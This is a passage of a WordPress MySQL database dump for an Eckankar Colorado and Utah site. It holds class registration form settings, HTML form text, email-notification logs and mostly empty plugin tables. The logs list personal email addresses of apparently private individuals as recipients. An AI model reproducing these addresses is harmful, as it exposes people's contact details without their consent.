Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - CO Temple - Hybrid\";s:5:\"value\";s:95:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - CO Temple - Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:16;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-8:30 pm - Zoom\";s:5:\"value\";s:79:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(18552,681,'container_class','','container_class',''),(18553,681,'element_class','','element_class',''),(18554,681,'admin_label','','admin_label',''),(18555,681,'help_text','','help_text',''),(18556,681,'drawerDisabled','','drawerDisabled',''),(18557,681,'field_label','Select One Class Per Registrant','field_label','Select One Class Per Registrant'),(18558,681,'field_key','select_one_class_per_registrant_1658696832524','field_key','select_one_class_per_registrant_1658696832524'),(18559,682,'editActive','','editActive',''),(18560,682,'order','1','order','1'),(18561,682,'idAttribute','id','idAttribute','id'),(18562,682,'label','HTML','label','HTML'),(18563,682,'type','html','type','html'),(18564,682,'default','<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>','default','<p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 33px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">2023-2024<br>Colorado &amp; Utah</p><p class=\"\" style=\"font-family: Raleway; font-weight: 600; font-size: 43px; color: #1d5791; margin-bottom: -8px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\" align=\"center\">ECK Satsang Class Registration</p><div style=\"line-height: 150%;padding-top: 16px;\"><div align=\"center\"><span style=\"font-size: 24px; line-height: 150%; color:#b8860b !important;\"><strong>This form is only for residents of Colorado and Utah. </strong></span><br><span style=\"font-size: 24px; line-height: 150%;\"><strong></strong></span></div><span style=\"font-size: 20px; line-height: 150%;\"><br></span></div><div style=\"line-height: 150%;font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;\" align=\"center\"><b>NOTE: </b>Satsang Class registration must be completed by the 3rd class meeting.<br>After this date, registrations will no longer be accepted.<span style=\"font-size: 20px; line-height: 150%;\"><br></span></div>'),(18565,682,'container_class','','container_class',''),(18566,682,'element_class','','element_class',''),(18567,682,'key','html_1632671894259','key','html_1632671894259'),(18568,682,'drawerDisabled','','drawerDisabled',''),(18569,682,'field_label','HTML','field_label','HTML'),(18570,682,'field_key','html_1632671894259','field_key','html_1632671894259'),(18571,683,'drawerDisabled','','drawerDisabled',''),(18572,683,'editActive','','editActive',''),(18573,683,'order','9','order','9'),(18574,683,'idAttribute','id','idAttribute','id'),(18575,683,'label','ECK Member Classes Available for 2023-2024','label','ECK Member Classes Available for 2023-2024'),(18576,683,'type','html','type','html'),(18577,683,'default','<div style=\"font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p>\n<ul>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>\n  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li>\n</ul>\n</div>','default','<div style=\"font-size: 20px;color: #333333; background-color: #efefef; padding: 10px; border: 1px solid #d7d7d7;line-height: 95%;\"><p class=\"\" style=\"font-family: Open Sans; font-size: 20px; text-transform: none; color: rgb(29, 87, 145); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><b>Classes are open to all Chelas residing within Colorado and Utah. Available class formats include:</b></p>\n<ul>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">In Person Classes<br></span></li>\n<li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Zoom Classes<br></span></li>\n  <li style=\"font-family: Open Sans; font-weight: 600; font-size: 21px; text-transform: none; color: rgb(65, 67, 68); padding: 0px 0px 8px; margin-top: 10px; margin-bottom: 10px;\"><span style=\"font-weight: normal;\">Hybrid Classes  <span style=\"font-size:19px\">(<i>Hybrid events combine in person and online attendance</i></span>)</span><br><em></em></li>\n</ul>\n</div>'),(18578,683,'container_class','','container_class',''),(18579,683,'element_class','','element_class',''),(18580,683,'key','eck_member_classes_available_for_2023-2024_1693928749137','key','eck_member_classes_available_for_2023-2024_1693928749137'),(18581,683,'field_label','ECK Member Classes Available for 2022-2023','field_label','ECK Member Classes Available for 2022-2023'),(18582,683,'field_key','eck_member_classes_available_for_2022-2023_1660414260469','field_key','eck_member_classes_available_for_2022-2023_1660414260469');
/*!40000 ALTER TABLE `wpcl_nf3_field_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_field_meta` with 14492 row(s)
--

--
-- Table structure for table `wpcl_fluentform_logs`
--

DROP TABLE IF EXISTS `wpcl_fluentform_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_logs` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_source_id` int(10) unsigned DEFAULT NULL,
  `source_type` varchar(255) DEFAULT NULL,
  `source_id` int(10) unsigned DEFAULT NULL,
  `component` varchar(255) DEFAULT NULL,
  `status` char(30) DEFAULT NULL,
  `title` varchar(255) NOT NULL,
  `description` longtext DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=101 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_logs`
--

LOCK TABLES `wpcl_fluentform_logs` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_logs` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_logs` VALUES (1,4,'submission_item',1,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-23 22:10:11'),(2,4,'submission_item',1,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-23 22:10:11'),(3,4,'submission_item',2,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-23 22:13:12'),(4,4,'submission_item',2,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-23 22:13:12'),(5,4,'submission_item',3,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:11:01'),(6,4,'submission_item',3,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:11:01'),(7,4,'submission_item',4,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:23:39'),(8,4,'submission_item',4,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:23:39'),(9,4,'submission_item',5,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:50:02'),(10,4,'submission_item',5,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:50:02'),(11,4,'submission_item',6,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:52:24'),(12,4,'submission_item',6,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 22:52:24'),(13,4,'submission_item',7,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 23:05:26'),(14,4,'submission_item',7,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 23:05:26'),(15,4,'submission_item',8,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 23:15:47'),(16,4,'submission_item',8,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-25 23:15:47'),(17,4,'submission_item',9,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 04:14:27'),(18,4,'submission_item',9,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 04:14:27'),(19,4,'submission_item',10,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 04:32:56'),(20,4,'submission_item',10,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 04:32:56'),(21,4,'submission_item',11,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 21:50:08'),(22,4,'submission_item',11,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 21:50:09'),(23,4,'submission_item',12,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 22:24:00'),(24,4,'submission_item',12,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 22:24:00'),(25,4,'submission_item',13,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 22:40:44'),(26,4,'submission_item',13,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-26 22:40:44'),(27,4,'submission_item',14,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 04:30:28'),(28,4,'submission_item',14,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 04:30:28'),(29,4,'submission_item',15,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 04:42:37'),(30,4,'submission_item',15,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 04:42:37'),(31,4,'submission_item',16,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 15:59:32'),(32,4,'submission_item',16,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 15:59:32'),(33,4,'submission_item',17,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 16:59:30'),(34,4,'submission_item',17,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 16:59:30'),(35,4,'submission_item',18,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 17:16:35'),(36,4,'submission_item',18,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 17:16:36'),(37,4,'submission_item',19,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 17:58:57'),(38,4,'submission_item',19,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to wmmrogers@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 17:58:57'),(39,4,'submission_item',20,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to webmaster@eckankar-colorado.org.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 18:25:04'),(40,4,'submission_item',20,'EmailNotification','info','Email sending initiated','Email Notification broadcasted to choll.03@comcast.net.<br />Subject: Form Record Received: Initiator/ESA Request','2023-07-27 18:25:04');
/*!40000 ALTER TABLE `wpcl_fluentform_logs` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_logs` with 40 row(s)
--

--
-- Table structure for table `wpcl_gg_galleries`
--

DROP TABLE IF EXISTS `wpcl_gg_galleries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_gg_galleries` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `settings_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_gg_galleries`
--

LOCK TABLES `wpcl_gg_galleries` WRITE;
/*!40000 ALTER TABLE `wpcl_gg_galleries` DISABLE KEYS */;
INSERT INTO `wpcl_gg_galleries` VALUES (2,'Colorado ECK Temple Gallery',0);
/*!40000 ALTER TABLE `wpcl_gg_galleries` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_gg_galleries` with 1 row(s)
--

--
-- Table structure for table `wpcl_mec_occurrences`
--

DROP TABLE IF EXISTS `wpcl_mec_occurrences`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_mec_occurrences` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` int(10) unsigned NOT NULL,
  `occurrence` int(10) unsigned NOT NULL,
  `params` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `post_id` (`post_id`),
  KEY `occurrence` (`occurrence`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_mec_occurrences`
--

LOCK TABLES `wpcl_mec_occurrences` WRITE;
/*!40000 ALTER TABLE `wpcl_mec_occurrences` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_mec_occurrences` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_occurrences` with 0 row(s)
--

--
-- Table structure for table `wpcl_wffilechanges`
--

DROP TABLE IF EXISTS `wpcl_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wffilechanges`
--

LOCK TABLES `wpcl_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wpcl_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wffilechanges` with 0 row(s)
--

--
-- Table structure for table `wpcl_nf3_chunks`
--

DROP TABLE IF EXISTS `wpcl_nf3_chunks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_chunks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(200) DEFAULT NULL,
  `value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_chunks`
--

LOCK TABLES `wpcl_nf3_chunks` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_chunks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_nf3_chunks` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_chunks` with 0 row(s)
--

--
-- Table structure for table `wpcl_cf_queue_failures`
--

DROP TABLE IF EXISTS `wpcl_cf_queue_failures`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_cf_queue_failures` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `job` longtext NOT NULL,
  `error` text DEFAULT NULL,
  `failed_at` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_cf_queue_failures`
--

LOCK TABLES `wpcl_cf_queue_failures` WRITE;
/*!40000 ALTER TABLE `wpcl_cf_queue_failures` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_cf_queue_failures` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_cf_queue_failures` with 0 row(s)
--

--
-- Table structure for table `wpcl_nf3_relationships`
--

DROP TABLE IF EXISTS `wpcl_nf3_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_relationships` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `child_id` int(11) NOT NULL,
  `child_type` longtext NOT NULL,
  `parent_id` int(11) NOT NULL,
  `parent_type` longtext NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_relationships`
--

LOCK TABLES `wpcl_nf3_relationships` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_relationships` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_nf3_relationships` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_nf3_relationships` with 0 row(s)
--

--
-- Table structure for table `wpcl_wpc_accesslocks`
--

DROP TABLE IF EXISTS `wpcl_wpc_accesslocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpc_accesslocks` (
  `accesslock_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `accesslock_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `release_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `accesslock_IP` varchar(100) NOT NULL DEFAULT '',
  `reason` varchar(200) DEFAULT NULL,
  `unlocked` smallint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`accesslock_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpc_accesslocks`
--

